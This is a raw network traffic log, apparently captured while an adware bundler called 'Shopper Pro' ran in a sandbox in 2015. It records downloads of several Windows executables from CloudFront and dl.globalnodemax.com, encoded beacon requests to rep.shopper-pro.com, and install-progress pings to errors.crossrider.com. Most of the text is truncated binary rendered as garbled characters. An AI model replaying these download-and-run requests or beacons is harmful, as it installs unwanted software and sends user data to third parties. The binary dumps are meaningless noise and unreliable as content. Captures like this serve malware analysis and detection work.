{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Sat, 01
 Aug 2015 04:17:51 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Sat, 01 Aug 2015 01:57:22 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Age: 8378

Content-Range: bytes 0-249999/2707024

X-Cache: Hit from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Ghti80leq55ItkvywbrYJ8BzYtRC6OjFNyx0X0ng5uxvEYWNC8c79Q==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.........Y)......................................s....................
...4)..............................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Sat, 01 Aug 2015 01:57:22 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Age: 8378

Content-Range: bytes 500000-749999/2707024

X-Cache: Hit from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: qQlQfQ9KwmM2O2LpDUhYw-xAF5kjMojHZF3aWDfJhdImYDCMI22DtA==
..8...~....v.D..M..cJ.0KKDP.^..g.Q._.!.......n.=;..]....#.......a....p
...\..p.8qH6~..N..[..m..A..w.p.............k...@ .D....'.?*....DR.....
Y.\'.-.X.9.X.[.[a..[0..#[email protected].@Xx.../;..f.............LX...2B7.X5...`
..lp......;..f..r...Y........|IX..T.LL.P.*.6........H..O.[H.. _.....6.
O.F,L>...Q.q..Nx.|...{f......sl.upC.#.\mO...0.....Tw.R2.yj..}..}.d.
.K........yF..T^....eh..v.."...*[email protected]>...\....u..{/.N.Ib@.
.,...[...0BC.C..<>2....J.Z...."qYT.W..1k...>1v..&....C.>s.
...~.a.c......W.%9...X.`X.x.-.[.#ch]...x_....g5.66.....>.i....Kp.(.
1z...........v.I....]C.......=.Mc.S.2.b"[email protected]...&C.]...9..A...o
....o6..Q(.. .......U#...emJ..n.Lb.T!I.0.&Z..'v....".j...{[email protected].).7.h{.
.?..jA".~*J....i........\.g........P06j9.U...."..z.1P)........h.......
a....0..k_....,.PB..<*.....8I6.7..../E...7.{`.H......8..g.#..K..__.
.%.l..'..X....`[email protected])....,.z..o.5;fg3u...J$..;,y... .:0Ti.-.
...d..fq._....F...|...R?i.....Xi.\c.)...y.. ..g..i.N..[.p.AC....jw^C..
... ..srB....$.bKHCu.^...!NxC..._0s...........Uz..j.}..D..k.]y.(.O_fto
..i,.........C...F...>CNl.h..(|9.w.Md.......@.;.B..``.8.W[.u..\.}.k
...'.......i.`.t..l...h.......,...b.me.w.).'...{."EE|.>.6T....O....
........=..&..ur.....M.E.d...*r...'5Y..Oo..Ky..~k|....H.....P.^.A..5..
...>.D.^....%.wx..%...d<.4..M....[~..:$.....mB...._.TD...c.<D
F.~g.5.z.X5EoZ.......9=.\z.....p......f...0.#..g.."..EC....#.~<....
..!.......HF.......b.yX..q.Z..C.ZN.........?....`..(.E....w.....S..{O.
....u.....z.~./..{...iT..l........U{...q .q9..!..D....leV.../.&w..<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Sat, 01 Aug 2015 01:57:22 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Age: 8378

Content-Range: bytes 1000000-1249999/2707024

X-Cache: Hit from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: _B7Wd1H_gKZbto9AMy0JVj7yV6Snn0ucJIxbYUFu8fvjGIUuJQCStg==
...:.g...-).'.#.\.^[email protected]..'.oy.~..C.| ....B>q.}g...e.!...e.
.H^<.T....L5.my).C. {K.LA.r.w.n.-..s]....y....c.......9......Cf.)..
[email protected].=...@.~...k6.X.<..`..O.:....`.A..4....z.I...M.g.
u..P..b..).j........^...... R.W..T.%k.[]..<...}...,..nI .(r.._..>
;....'.c.......T.'....V. [email protected]...`....J.....i...F...)....B"..[.
..2..L....o.0F..Eh...._...%m..W..b..PJB..........}:g.....;.....z..D.e.
..pP.R.... .dYe..Lc....73.g..0.a{..c.'...b.....G...c=.. ...V'....I....
...@#.7\[email protected]...`..7v.I..../<N{H...)...sPe1.3....v...\...!~.
..>.XB>..LI............T[...*{.qq7...$..i<..0m..yp`1a[.}.....
..Ot..{.....%.==..|~9.).2^...,.f....d'...&.;...d......P5..6.Bk...jz5.$
......o]...&.V9..t.....F...._.......y....Z%....|...`.0..?G..X]...u.v..
!L..l....,..y....N...<&..v.p.m....d.~o....."Q..9W~ZU........|R..*.|
f...1.&.......g..f&.|..}[email protected]..?s.e.........u.8.y....h.......' [R...
".....O............*TB.......D.J.Q}..5U.>..h....=.!...<.&:4rR. .
G...F?.p...z6.....-`.;W&sn.{L...r......f:`[email protected]\&
..\g.......H...a.5.C.[....$6Y6.g....:.....Q2.`.".Kj.$$.....o.&.;.)...c
....>%.~...=.(.....9.....b4.7T...B.}5G......j.B;e.Au....P...Y.>:
.hl&..Z.cI*..j......uT..S.}.~.i81.e. D..S.......Hi........*b...f.o....
B..J..#w...7z...zK.Q.qs.i.a|......U.,M.....cG..4Hu... .:j...{k...3.0.6
..B...`.. ?5...f....o.xg.{}u.,a...0V.v5..#..i.N66Te...q..j....__l(..bI
...l..=......o..=.... .:......2*b...f...d.p..h./%.s.B..}..M......5...v
%.?.3.......B0.....Z...[ILZ...G...F.g.Utu.Q....{...4.~t.i.k.9c..?.<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Sat, 01 Aug 2015 04:17:02 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 1500000-1749999/2707024

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Fg6Jdc2yf3aiSVLc-PbgKyN_xgcmv69QrBUudisXG-c5OZje74y2lQ==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Date: Sat, 01 Aug 2015
 04:17:02 GMT..Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT..ETag: "1a
f5b44d8d4f63f1a2db7e63dd4da19f"..Accept-Ranges: bytes..Server: AmazonS
3..Content-Range: bytes 1500000-1749999/2707024..X-Cache: Miss from cl
oudfront..Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (Cl
oudFront)..X-Amz-Cf-Id: Fg6Jdc2yf3aiSVLc-PbgKyN_xgcmv69QrBUudisXG-c5OZ
je74y2lQ==........M[../.<. .Qc..~(..=.t..G.d.._...9......9....e...j
....%..l8;\8...=.........e.W.........:..'..:A\.ix..2.9X.g.L.....K.m.@.
.-.L.......F.I.D...1h...b@..`{J......0l&k..e.\...)..6(.s5....gWN..NM..
[email protected]:E.....s1FQ6....`.....L....
?g.......^.....K.G.........(.....$..........:4cw.Q}...E.....q.@. w7...
..M.V.......6...SA...........e...........o`8........"...$...-.....t.E.
.'....}.....4S.....S...amtG....56r5...U....Wu.(.K].7.......;..?......0
.......%s..F.R...]*.....r.d.v.....=LM.h|u.<>.|...< .-..t.Laj1
...1K...$.-5.].!....1......i.........6.....B.T.}.O.LV.e.*~......b./...
z( .......q\.l.K.f..`[email protected]..`.../...N..G..........
.K.n......*.......0.......d..8".....Yea.<8.[m}.MIQ......|%Re.i. H..
{B.n..:.#."..G.a..nR...E|....Ri.lj.i....}OZ..!...){.T......z.....J1...
......B....).>.o.5..l'>?I.%[email protected]....<.J.IY..S.
.5.~L....k.......\..x....5...C......{......a....*......(ez......XQ.:._
...U.wF.....TE.....3.e|..{.o......^x...;B.X`.j..fida...tD.%]#X..n.<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Sat, 01 Aug 2015 01:57:22 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Age: 8380

Content-Range: bytes 2000000-2249999/2707024

X-Cache: Hit from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 75qr-Ek7Fbcr4RD1hoZZBEIR3zND28KXNYBd0iXb3jWIhPdhoFkaKQ==
..{/.W..9..~"....!...u..h.Tuu.z.>6.*.n...v.o.1.`....L.4H=..7.....[M
.f.9$....yD..jd..........a.9....v.X.q..4.>..3.........1...&.L.....X
.#..!......>..........Kh.(5b...(Y}}h ..>.p.bV.|...$ c.........R{
*8./e.2)Lk.^..%......yX3.#.F.6jO... .....^..2R..E!...F.....){#.]f.O..;
l.Y..o.u..'..Z....h...&..SL.ie....i,L..g.....f.C/|.G.......Z....F.....
.o4...j..b.,.........5u.6%la......1........... t).&.3d...Y.d......z..0
.bG&.5..0.z?.....8...yJW.5...)....%.X.F.y"Y...NM....p..p...5...)......
2.q..Z...L.o.. ..Le.b...]..p..*.X.J.......E.&x...Y.J..~.K...P..{<..
).k.{...lp....1J8...[L.>...o.....4..j..2...`g......T..... 3;.Q.....
.........h#O...&i.Y9.q6 N.3P./[email protected].\tzc{.....D.$..h..,.
K..hK.....tC\.BX...V...l...1.....U.....%f...........U..b.^..P.....V...
N.....{.....&.............|.H...{8.Ij.Gk...a^.....E.5...Ei...b.%sF.d.)
...^b=D......S9(.....P7h...s..>C..s.P-.^J..^[email protected]..?......?....u.
../....Bz" k...J..t....EW...hwL..]..^....H.E.B.6....#?P=S....n~..}.X.M
]4%7....3.L.c.t~]... ..S~a:1....E.........s..m`;.......[=.kI#...m....|
.,J ..:.../..{.x..k{.p.x.25..}..../{.W.t .t....udO.....~..T.....Uw..#.
oN.P.a.G9....3k@l:.{oGD...................."U..H...Nt1I...L....eP.#m.P
...6.^p....oL..I.._.8.h..s>(y[.8R..;'h3#2Ab.D......m.!.k..>..(. 
$..CMR..|.....I.8..S.H.(...|v....J..>GOL.R......,.....a......H>S
k.....Z..t5.......k...$U.Y7.<..D4.1.Y.;.VK.O..y......K...f .;h.Hc..
...a9y.Y~.J).....V.NU.R.....}OU.........-1....J..[3.SU.rT.1..X.......G
....:w...(#%3.y.~4Us..au9.F.[..8:......r.y.l...B..y.<_<_.V?.<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Sat, 01 Aug 2015 01:57:22 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Age: 8380

Content-Range: bytes 2250000-2499999/2707024

X-Cache: Hit from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 3lpspDX6tjC8_ARcgDnFWEAint6_e6UPBJAGRMJ0A5c8j6f22Gg0cQ==
.*^.'....B..P.~......O.[7..t...q......y=... .....8...:#.u. ...z...B!.^
.....S..`.=0*.yL...WZ..@....~...zD....,..G......O.I...d`...93&]D.Q.G..
.t.....e.IQn.K.d,wRTog.. ......}.y5bKd......z5..).BNO.P.b..5.q.......V
.....Z..R..(...Gx.....|.A.9G!._`..iQ7.t.........mH.1i0f.X\.'.p5b.\.]..
...BME.1W.D...yzrr>.W.Z.l..U..P.. I8...!..X.}.7N.>t..:...4....%K
.~&.:.d......`..b]......\.otl.U.......m..%....D5...Wc.J.....n}|-]...#.
..}4.O.....[[email protected]....^.oO...1....g.U.,G...r1R\.......H......x.]^
.......V0....bs.~.G2.y...9..$;....!-.,..F;jF..............<....<
[L.q.......Y. ,a..&.z..f^..2...i$. .......L%...........==..?..D..%|...
....|."..-...%u.WI..P-..,..j..j0x..F.6..B....K..."{dv...............H.
.7h....../Z.IE.1..(...V(...... ......G.].Wh....N...ezD...|.l.IYAnV....
.[..-,......?.....l.[../.l.G....".....A...lw...R.Z{=........d....8....
.`rl.....$....\p;p..4....;.as"f...;...Rvp.n...O.4.k..=...K.S.Bg\#54...
~.w..-.....]9. P ..^.{n.MY.w.^.| p.....r...V.........=..].$ .Y.".3s..\
..%..L..C.o.2.R...0Q)$^!....\....B...d.C...... ......U... o.....et...a
..sfQ...J.p..2./....Y%..]....p.C..G.....1.!...I........`........zduD..
..Q8..%..pu.e..1.S.A|.b.....w(.T.o.{>....Zq3.>c...C..Yo_P....w..
e>.0...C..0..K.r ...I%.'&y....XI..F.&."...D....DcTr.w......B.....$=
I.pa...SJ.3'i.i"H..).`{..-........b.....5....Y....7.uyyA..egM>e....
KG2. C..-H....ux=..l..A.^V.9.......]~ .-....C.g;Q...%.#)7...%Xc=....8 
[email protected]....<#.o..hL......8>. e.. c....)....D.v\...I.......
.R..3}.>[email protected]. ...e.....5.o.<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=2500000-2707023

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 207024

Connection: keep-alive

Date: Sat, 01 Aug 2015 01:57:22 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 2500000-2707023/2707024

Age: 8381

X-Cache: Hit from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 2sAMLKilT9_HfyT_tBlTMQxWRbh4QJDrs2RthMa7L5P7979a7X7iDg==
.....s.7.....C.c ...V.....r.............#.H.Z.3..C..vzt..7..s.j..~.e.U
.!...>7.....t.rZ....%,..1)?8.0.......JV..cn...Rh...g..ti.sR:(......
|.&...S..B>{.Y024.E..S.O.e..E. ..OQ.9...... U.f...N..2..2..\g.<U
E....FT4../...H....J...~._4.wy.8......r.z)Oa'...zsg.(.g...af...*.....#
...R.[..$1Y...........o..6...i&e).... <..........`.*.x.....vz....@C
.Q..u....l.G.$*..k<v.3...s.a%..ai.0..........f.....N...b...MP.cg..(
,q.0.....%.........,@.......2....r.y.....Z.'..m.).Q-.<...:U...i..z6
.....)'S..-w..WCI.D..a.....]!tZ.HI...x...j...d.....<U.?_.......x...
.\.|.w....C...p....#.......E@....^...\.i........,.M.6....jj[h..."3.o.a
..%A...E.f._.R7'.x....)'[email protected].^.D.T........G"gq.
L...!E...L9..bs........ .Y_.rs...V. ....JvR.Q....u...K........,l.b|JEh
.^&....)J5>.:V.Y.j.Y....B.hS. ....%`.c..H.om*.:....k.......Xf....&g
t;.W ...l.......Hn....F5..N....i.f.b......g..N...S.2!......L....~.$...
........jm..%......A....,4..I'Fr!\..[H....-(4.....oX.{...a..T.6..@.)..
]%.E.z.S..{..C.8G.,.ARp{.....LV"....|.c..........U.qX...H}F....6H.8!..
o...V..M..Rf........sb.z..;.k..?k...G"[email protected]......^.Ct......6^..
a#p..y?.Yz...q5...J......$GY.S...._....{..m.......k. ..C..Mh...xR5Q...
2_...|.56y..C.X.L%:X..F/Bz.l..#.cb{.E..1 .k.Q..d...o.. .......Q.G....X
^..?...)...<..<. .!TIk v......p*<...L".. .k.(X?.n.T9.d\\....g
.>i.....Gpj6.....l.t.....T.p0.1.........I.(...'....,,.%.1..=...C...
B...=.j......7I.o....]|B;..X`v.r.....7.2.Mc....A. &keb2..%_... ..g.n..
.g...U.h.;.XH..cTf"..}9..r.j .....\q.D..#.Rhd.{..y.....[1.....Z%.3<<< skipped >>>

GET /utility.gif?error=done_mem_0&report=mini_s&ver=1729&action=na&ms_vr=3&clock=22610&rnd=18667 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:18:00 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?error=start&report=mini_s&ver=803&action=na&ms_vr=3&clock=0&rnd=23400 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:38 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?error=start&report=mini_s&ver=1729&action=na&ms_vr=3&clock=16&rnd=23400 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:38 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /spdbt/shoppy/snsch7.exe_b HTTP/1.1

Host: dl.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:39 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438276439"

Last-Modified: Thu, 30 Jul 2015 17:13:59 GMT

Cache-Control: max-age=1462

Content-Length: 2088396

Content-Type: text/plain

X-HW: 1438402659.dop008.fr7.t,1438402659.cds011.fr7.sr,1438402659.dop007.dc1.r,1438402659.cds003.dc1.c,1438402659.cds011.fr7.pr
.........j3.4_..ik..8..;.. ../......Rw..:.8.j...Oj2{...'.K..5.hP..B.&l
t;...h.I.D.............MX.|.n.........k`....K.=.y..][.....)....Th^....
. ....s.......8L.?5..S.."....G.......!.....{...._.S.|...#;...<"f~..
..-T.f..=1 *.w.c7...>..Ry...E_W.T.}DA......*...(I......Y|......`.W.
......p...>Q....-..tt../^....."S..;.?..E..f. d...x....S.3....5BT..H
..........Sn.nuos|..c.LN....Z........E..fH.2;.7.x'./..U.g#0.<..H...
m.....D.W..L9.[.6.J....".N.eL...Ypd.qm..*..z.u.....y.5n..!hu.q.R...7..
0..k...-..Mr.SO...G...M'rW.-....Cj.e.n1.J.[....J..R..H.....pQ2d.qc..T~
*0....h.\.\-........x.;..S../r.>Q.."..n.mMJ) ..t:u_e.....c)..N...s.
..]1.....d.....Z....L:.[20...C...Q5..:..J..)7.....O.;..e..J.....2....W
...:9.........RqMx...'$X..b...8...^Y..HX..oRs..D.P..;e.}.4=f.}..D..Y..
...s^...~.....|.:..v\...y...Q.g.Q..]}.....7...:;J...e.<.A.....i....
....= n.T...>s.K..&#^..^X.i.._qMo.KT.{../G.E..]1.y..1..K.......U9..
]t..C..h.Z.z.B.W.`h3B...7Y8...8.I..j..%... ......c..0W..50s...F.}^o._.
?.....)p.T..ZY.1.8..'.........&...].I#$j.'?.m..d_O..#. ..q..$.....\K..
x.......\ ..KN.......P.8...{....b4...Dx6....hk.6.,:6..{.'..F..C{L.....
..!.V.TC....]S.......u`..g...:di.`.*...l........a...9o.X..7.M..q.QB...
./.W..g.....w,.._/.>8..a.j...@.)..9,.........'`!..PV$....4..Ti5~g..
.............X...;......^1...z.M..\.................C...K.$.6B...U"...
.....\-.......CZ.....vzz.9..:.`............/..O.H..v.....d...A"w..~gB.
.......?...I Q.....nw.g%.l......0...Q.E=O..Q"....VU.ID&7..kC..Q?.qNHr.
T].!....a5........]...Z..kC5\....%(.... ......O...u......R. ...l..<<< skipped >>>

GET /app/ping.ashx?e=hNMAVKhukry7P4fECSsJwloXilXt x7lK8Uk6qaOqbIicvsFwQStENB87jgWTbK/3s5q cLFxyzJSKLVhW6rmW/5rCyD2Xgytgv4rmtJTtdjDTVY3IA3SkUvubeDU93VIs0AEv1kh1DKJj24mv8XjnS5StnPX94HWqnaKp4YBMTpBU9U/r/dsNyvhlGeipNV6LgZQ8/fOZCiThn9Pg6 S9OHlqnpoaqAkC1fv30UfvKld0ylS1bImyBTYvJf3vjRbJ1qu5mi2nG/wC513n 0HRZRXx49nRJ1TcWL70UkzVrp4nRJFoUZgp4Yvmw1YuoPQOGdJX7Ys4OCi0N7aB6YG6hHY oh5wmy9pSoWtDn2v0LZyn40Iw2XriTPqtAWXps8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFawUbmkSx215x4j1VNOEsndx0FrV7x5rPXEmrfQGcHKRxmOFGE02dWYVMq3nYMuxdi r7NiSQEydOFU5mMfA2YwPKMRKx/Hy aYD1xi6d0GBG/fDcmPtyb/6CnTX MB8zBtIY2WtWIlXvh37zCULcAJjU0tqMnFrjE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Length: 0

HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 01 Aug 20
15 04:17:07 GMT..Content-Length: 0......

GET /app/ping.ashx?e=M/g8cQcNP KIItTUp4SEbcPJzAExCGuv2YTeaOaZJPFysSIQM/WMqhsgZm851Wm7Y4rWxtGruLEcdSxeBQrefTtdlsQvNjEsRp4Ckp mcZsxEz6FfERdwJw4LO6ub5l5rBjqlmzKnb1Tx2y1fQnwbvamwkcEQSgOU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOTzbANYrsS2gR3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHl0G73pRFkYRgncIi2chNT3eo /8EQQ7EaKr1l icJHo6jHoUXX2l omWJ/Ex9z3tzJVvURajp4qlUQ7Kz5asHZpCy29 Yy361S7rZnnZ2TU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Length: 0

HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 01 Aug 20
15 04:17:07 GMT..Content-Length: 0......

GET /app/ping.ashx?e=siwKo8d7dVSIItTUp4SEbQJu76sBMJpY2YTeaOaZJPFysSIQM/WMqhsgZm851Wm7Y4rWxtGruLEcdSxeBQrefTtdlsQvNjEsRp4Ckp mcZuBRen/2tOqQlo8H6qezB8RXqkSFNls Rah094EYGQaeEZDP9BIkAtrSutvT1yx4dwIunIXNkmXKy5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VC51CUbXbhryEU5MDCXDxgXw8weuLV7sL008nm/3qTHBtVZMWj5VvxhAswSJxuoqNeoiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 01 Aug 2015 04:17:08 GMT

Content-Length: 0

GET /utility.gif?report=fdata&f=3&c=1729&i=35&n=ms_about_to_exc&rnd=28949 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:42 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?report=fdata&f=3&c=1729&i=20&n=ms_start_download&rnd=916 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:39 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /web/gf/all/setup.exe_d HTTP/1.1

Host: dl.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:39 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438313683"

Last-Modified: Fri, 31 Jul 2015 03:34:43 GMT

Cache-Control: max-age=461

Content-Length: 2113811

Content-Type: text/plain

X-HW: 1438402659.dop006.fr7.t,1438402659.cds008.fr7.c
...tc....%....v...tjk......0D.~.....Cn...k.o.R.t... ....K....4.(_.`...
.2.r....!...N.jI.fLL..vuca6...^.7.9%-"Vk..-..}.|.....c~.Q..i......ol-.
....~...O.ehp..'.o_..o]..R...{....A.....c..{n-...3u8*M`T.2.......f....
.......ZZ......Q:.*r...../...%......n..a..Vg.....P...;...........L.k].
V.?.cIG\oy.Q.X'....p.../Q.!.u.B.....A..y8."....<.XZC."..Er......q.-
R..._..T.,v..t.M...$.....;...b..z..v..~K.&o...W.."P..^......1s.6.Kf[2.
..gso ..R.(.z..;n...U.W..S....)....g...t..z.....j.B..d3W!.HAp=6B.z.%.F
.&R....!C.....*.&).I....}b,d.c\|/*?....{.(.A..1o..-..........%..|d.H*.
[email protected].{T.-.2F.....T.o.`..;.aQ.............}C..)Et0
 ...2.v..J..X......#...W9.tq...-.7...;4.......,U..o.}$.../......d.....
..*...../8....5....]C{.|..G.....].0...E...Z.V ...g#ic.h....H..'.'"..k=
...vj..g9....|a......h.-....c.... ..T..G.!........`... .rsu.........!P
!/ll..f..(gA...=JAcA.SQ......^_1J.eW..M.6|.v.I.z.p>..l1^..v...U3g5.
....Loe.Te.j....7..`..k.XS.(....=M...5..r.w..;.S.8i.Kw.H.c...R.AN..,t.
.W..X.A..UesF.z^.r.1Wd|c.?.:."#.?.z%.c..2..".V.g..IN..}.2.:....._.j...
....GS...%f...G....:UcA.v..n....4...k...{r...PrS...XA.....c.RV..X(...5
.q.."6<....&.!...7.M@...'.hH...Qsg..R...E.#4n.... f....vh...n..E.q`
